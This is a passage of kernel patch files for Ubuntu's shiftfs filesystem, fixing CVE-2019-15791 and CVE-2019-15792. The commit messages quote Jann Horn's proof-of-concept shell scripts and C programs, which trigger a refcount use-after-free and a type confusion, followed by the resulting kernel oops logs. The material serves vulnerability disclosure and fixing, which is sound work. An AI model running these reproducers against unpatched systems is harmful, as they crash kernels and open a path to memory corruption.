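-with CAP_SYS_RESOURCE masked out of its effective set:
-
- cred_tmp = prepare_creds();
- if (!cred_tmp) {
-  err = -ENOMEM;
-  goto out_put_path;
- }
- /* Don't override disk quota limits or use reserved space. */
- cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
- sbinfo->creator_cred = cred_tmp;
-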
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 6a2b5e3d0d53..0d6ce377b07c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
-+		struct cred *cred_tmp;
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
- 		/* to mark a mount point, must root wrt lower s_user_ns */
-@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
--		sbinfo->creator_cred = prepare_creds();
--		if (!sbinfo->creator_cred) {
-+		cred_tmp = prepare_creds();
-+		if (!cred_tmp) {
- 			err = -ENOMEM;
- 			goto out_put_path;
- 		}
-+		/* Don't override disk quota limits or use reserved space. */
-+		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 10:41:03 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
- handling
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
-file from the lower filesystem without taking an additional
-reference to that file. After the btrfs ioctl completes this fd
-is closed, which then puts a reference to that file, leading to a
-refcount underflow. Original bug report and test case from Jann
-Horn are below.
-
-Fix this, and at the same time simplify the management of the fd
-to the lower file for the ioctl. In
-shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
-the lower file and set FDPUT_FPUT so that this reference will get
-dropped on fdput() in error paths. Do not maintain the struct fd
-in the caller, as the fd installed in the fd table is
-sufficient to properly clean up. Finally, remove the fdput() in
-shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
-__close_fd() call.
-
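-Condensed from the diff below, the reference fix in
-shiftfs_btrfs_ioctl_fd_replace():
-
- ret = shiftfs_real_fdget(src.file, &lfd);
- if (ret) {
-  fdput(src);
-  return ret;
- }
-
- /*
-  * shiftfs_real_fdget() does not take a reference to lfd.file, so
-  * take one here to offset the put from __close_fd(), and make sure
-  * it is dropped again on fdput(lfd).
-  */
- get_file(lfd.file);
- lfd.flags |= FDPUT_FPUT;
- fdput(src);
-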
-Original report from Jann Horn:
-
-In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
-
- src = fdget(oldfd);
- if (!src.file)
-  return -EINVAL;
- // src holds one reference (assuming multithreaded execution)
-
- ret = shiftfs_real_fdget(src.file, lfd);
- // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
- // extra references
- fdput(src);
- // this drops the only reference we were holding on src, and src was
- // the only thing holding a reference to lfd->file. lfd->file may be
- // dangling at this point.
- if (ret)
-  return ret;
-
- *newfd = get_unused_fd_flags(lfd->file->f_flags);
- if (*newfd < 0) {
-  // always a no-op
-  fdput(*lfd);
-  return *newfd;
- }
-
- fd_install(*newfd, lfd->file);
- // fd_install() consumes a counted reference, but we don't hold any
- // counted references. so at this point, if lfd->file hasn't been freed
- // yet, its refcount is one lower than it ought to be.
-
- [...]
-
- // the following code is refcount-neutral, so the refcount stays one too
- // low.
- if (ret)
-  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-
-shiftfs_real_fdget() is implemented as follows:
-
-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-{
- struct shiftfs_file_info *file_info = file->private_data;
- struct file *realfile = file_info->realfile;
-
- lowerfd->flags = 0;
- lowerfd->file = realfile;
-
- /* Did the flags change since open? */
- if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-  return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
- return 0;
-}
-
-Therefore, the following PoC will cause reference count overdecrements; I ran it
-with SLUB debugging enabled and got the following splat:
-
-=======================================
-user@ubuntu1910vm:~/shiftfs$ cat run.sh
-sync
-unshare -mUr ./run2.sh
-user@ubuntu1910vm:~/shiftfs$ cat run2.sh
-set -e
-
-mkdir -p mnt/tmpfs
-mkdir -p mnt/shiftfs
-mount -t tmpfs none mnt/tmpfs
-mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
-mount|grep shift
-touch mnt/tmpfs/foo
-gcc -o ioctl ioctl.c -Wall
-./ioctl
-user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
-
-#include <err.h>
-#include <fcntl.h>
-#include <unistd.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <linux/btrfs.h>
-
-int main(void) {
-  int root = open("mnt/shiftfs", O_RDONLY);
-  if (root == -1) err(1, "open shiftfs root");
-  int foofd = openat(root, "foo", O_RDONLY);
-  if (foofd == -1) err(1, "open foofd");
-  struct btrfs_ioctl_vol_args iocarg = {
-    .fd = foofd
-  };
-  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
-  sleep(1);
-  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
-  if (map != MAP_FAILED) munmap(map, 0x1000);
-}
-user@ubuntu1910vm:~/shiftfs$ ./run.sh
-none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
-/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
-[ 183.463452] general protection fault: 0000 [#1] SMP PTI
-[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
-[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
-[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-[ 183.510580] Call Trace:
-[ 183.511396] mmap_region+0x417/0x670
-[ 183.512592] do_mmap+0x3a8/0x580
-[ 183.513655] vm_mmap_pgoff+0xcb/0x120
-[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
-[ 183.516155] __x64_sys_mmap+0x33/0x40
-[ 183.517352] do_syscall_64+0x5a/0x130
-[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
-[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
-[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
-[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
-[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
-[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
-[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
-[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
-[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
-[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
-[ 183.560350] ---[ end trace 4a860910803657c2 ]---
-[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-=======================================
-
-Disassembly of surrounding code:
-
-55 push rbp
-4889E5 mov rbp,rsp
-4157 push r15
-4156 push r14
-4155 push r13
-4154 push r12
-488B87C8000000 mov rax,[rdi+0xc8]
-4C8B6810 mov r13,[rax+0x10]
-498B4528 mov rax,[r13+0x28]
-4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
-0F8497000000 jz near 0xcc
-4989FC mov r12,rdi
-4989F6 mov r14,rsi
-
-This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
-think this corresponds to the load of "realfile->f_op->mmap" in the source code.
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15791
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 35 +++++++++++++++++++++--------------
- 1 file changed, 21 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 0d6ce377b07c..9a6a7ad50b90 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
- 	return false;
- }
- 
--static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
--					  void __user *arg,
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args *v1,
- 					  struct btrfs_ioctl_vol_args_v2 *v2)
- {
-@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- 	else
- 		ret = copy_to_user(arg, v2, sizeof(*v2));
- 
--	fdput(lfd);
- 	__close_fd(current->files, fd);
- 	kfree(v1);
- 	kfree(v2);
-@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
- static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 					  struct btrfs_ioctl_vol_args **b1,
- 					  struct btrfs_ioctl_vol_args_v2 **b2,
--					  struct fd *lfd,
- 					  int *newfd)
- {
- 	int oldfd, ret;
- 	struct fd src;
-+	struct fd lfd = {};
- 	struct btrfs_ioctl_vol_args *v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
- 
-@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	if (!src.file)
- 		return -EINVAL;
- 
--	ret = shiftfs_real_fdget(src.file, lfd);
--	fdput(src);
--	if (ret)
-+	ret = shiftfs_real_fdget(src.file, &lfd);
-+	if (ret) {
-+		fdput(src);
- 		return ret;
-+	}
-+
-+	/*
-+	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
-+	 * take a reference here to offset the one which will be put by
-+	 * __close_fd(), and make sure that reference is put on fdput(lfd).
-+	 */
-+	get_file(lfd.file);
-+	lfd.flags |= FDPUT_FPUT;
-+	fdput(src);
- 
--	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	*newfd = get_unused_fd_flags(lfd.file->f_flags);
- 	if (*newfd < 0) {
--		fdput(*lfd);
-+		fdput(lfd);
- 		return *newfd;
- 	}
- 
--	fd_install(*newfd, lfd->file);
-+	fd_install(*newfd, lfd.file);
- 
- 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
- 		v1->fd = *newfd;
-@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
- 	}
- 
- 	if (ret)
--		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
- 
- 	return ret;
- }
-@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	int newfd = -EBADF;
- 	long err = 0, ret = 0;
- 	void __user *argp = (void __user *)arg;
--	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
- 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
- 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
- 
- 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
--					     &btrfs_lfd, &newfd);
-+					     &newfd);
- 	if (ret < 0)
- 		return ret;
- 
-@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	fdput(lowerfd);
- 
- out_restore:
--	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
- 					     btrfs_v1, btrfs_v2);
- 	if (!ret)
- 		ret = err;
--- 
-2.39.2
-
-From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 1 Nov 2019 14:19:16 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Verify filesystem type in shiftfs_real_fdget().
-
-Quoting Jann Horn:
- #################### Bug 2: Type confusion ####################
-
- shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
- passes the resulting file* into shiftfs_real_fdget(), which does this:
-
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
-  struct shiftfs_file_info *file_info = file->private_data;
-  struct file *realfile = file_info->realfile;
-
-  lowerfd->flags = 0;
-  lowerfd->file = realfile;
-
-  /* Did the flags change since open? */
-  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-   return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
-  return 0;
- }
-
- file->private_data is a void* that points to a filesystem-dependent type; and
- some filesystems even use it to store a type-cast number instead of a pointer.
- The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
-
- As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
- (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
- offset 0x10), and I use that to cause a memory dereference somewhere around
- 0x4242:
-
- =======================================
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
- #!/bin/sh
- sync
- unshare -mUr ./run2.sh
- user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
- #!/bin/sh
- set -e
-
- mkdir -p mnt/tmpfs
- mkdir -p mnt/shiftfs
- mount -t tmpfs none mnt/tmpfs
- mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
- mount|grep shift
- gcc -o ioctl ioctl.c -Wall
- ./ioctl
- user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
- #include <sys/ioctl.h>
- #include <fcntl.h>
- #include <err.h>
- #include <unistd.h>
- #include <linux/btrfs.h>
- #include <sys/mman.h>
-
- int main(void) {
-   // make our vmacache sequence number something like 0x4242
-   for (int i=0; i<0x4242; i++) {
-     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
-         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
-     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
-     munmap(x, 0x1000);
-   }
-
-   int root = open("mnt/shiftfs", O_RDONLY);
-   if (root == -1) err(1, "open shiftfs root");
-   int foofd = open("/proc/self/environ", O_RDONLY);
-   if (foofd == -1) err(1, "open foofd");
-   // trigger the confusion
-   struct btrfs_ioctl_vol_args iocarg = {
-     .fd = foofd
-   };
-   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
- }
- user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
- none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
- /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
- [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
- [ 348.105060] #PF: supervisor read access in kernel mode
- [ 348.106573] #PF: error_code(0x0000) - not-present page
- [ 348.108102] PGD 0 P4D 0
- [ 348.108871] Oops: 0000 [#1] SMP PTI
- [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
- [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
- [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- [ 348.143545] Call Trace:
- [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
- [ 348.145562] do_vfs_ioctl+0x407/0x670
- [ 348.146620] ? putname+0x4a/0x50
- [ 348.147556] ksys_ioctl+0x67/0x90
- [ 348.148514] __x64_sys_ioctl+0x1a/0x20
- [ 348.149593] do_syscall_64+0x5a/0x130
- [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
- [ 348.152108] RIP: 0033:0x7f77fa76767b
- [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
- [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
- [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
- [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
- [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
- [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
- [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
- [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
- [ 348.188617] CR2: 0000000000004289
- [ 348.189586] ---[ end trace dad859a1db86d660 ]---
- [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
- [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
- [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
- [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
- [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
- [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
- [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
- [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
- [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
- [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
- [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
- [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
- [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
- Killed
- user@ubuntu1910vm:~/shiftfs_confuse$
-
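-The underlying hazard generalizes: file->private_data has a
-filesystem-dependent meaning, so interpreting it as a struct
-shiftfs_file_info without first checking that the file really belongs
-to shiftfs is an unsound cast. A hypothetical userspace sketch of this
-kind of type confusion (toy structs, not the actual kernel layouts):
-
- #include <stdio.h>
-
- struct shiftfs_like { void *realfile; };       /* layout one user expects */
- struct other_like   { unsigned long seqnum; }; /* what another user stores */
-
- int main(void)
- {
-         struct other_like other = { .seqnum = 0x4242 };
-         void *private_data = &other;   /* opaque, owner-defined payload */
-
-         /* the bad cast: assumes our own layout without checking the owner */
-         struct shiftfs_like *info = private_data;
-         printf("bogus realfile pointer: %p\n", info->realfile);
-         return 0;
- }
-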
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-[ saf: use f_op->open instead as special inodes in shiftfs sbs
-  will not use shiftfs open f_ops ]
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-
-CVE-2019-15792
-
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 33 +++++++++++++++++++--------------
- 1 file changed, 19 insertions(+), 14 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9a6a7ad50b90..897e0163005e 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1087,20 +1087,6 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 	return 0;
- }
- 
--static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
--{
--	struct file *realfile = file->private_data;
--
--	lowerfd->flags = 0;
--	lowerfd->file = realfile;
--
--	/* Did the flags change since open? */
--	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
--		return shiftfs_change_flags(lowerfd->file, file->f_flags);
--
--	return 0;
--}
--
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
- 	struct file *realfile;
-@@ -1187,6 +1173,25 @@ static rwf_t shiftfs_iocb_to_rwf(struct kiocb *iocb)
- 	return flags;
- }
- 
-+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-+{
-+	struct file *realfile;
-+
-+	if (file->f_op->open != shiftfs_open &&
-+	    file->f_op->open != shiftfs_dir_open)
-+		return -EINVAL;
-+
-+	realfile = file->private_data;
-+	lowerfd->flags = 0;
-+	lowerfd->file = realfile;
-+
-+	/* Did the flags change since open? */
-+	if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-+		return shiftfs_change_flags(lowerfd->file, file->f_flags);
-+
-+	return 0;
-+}
-+
- static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
- {
- 	struct file *file = iocb->ki_filp;
--- 
-2.39.2
-
-From 7bb96158915054edeee67b13212cd19b8fff54bd Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 13:35:25 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs
- operations
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-Several locations that shift ids translate user/group ids into
-init_user_ns before performing operations in the lower filesystem,
-whereas they should translate them into the s_user_ns of the lower
-filesystem. This results in using ids other than the intended ones in
-the lower fs, which will likely not map into the shiftfs s_user_ns.
-
-Change these sites to use shift_k[ug]id() to do a translation
-into the s_user_ns of the lower filesystem.
-
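-A toy userspace model of the two-step translation shift_k[ug]id()
-performs - map the id out of one namespace, then into the other -
-assuming simple contiguous 1:1 ranged mappings (the kernel's idmap
-machinery is more general):
-
- #include <stdio.h>
-
- /* ids [lower, lower+count) inside the ns map to [base, base+count) outside */
- struct ns_map { unsigned base, lower, count; };
-
- /* from_kuid() analogue: kernel id -> id as seen inside the ns, or -1 */
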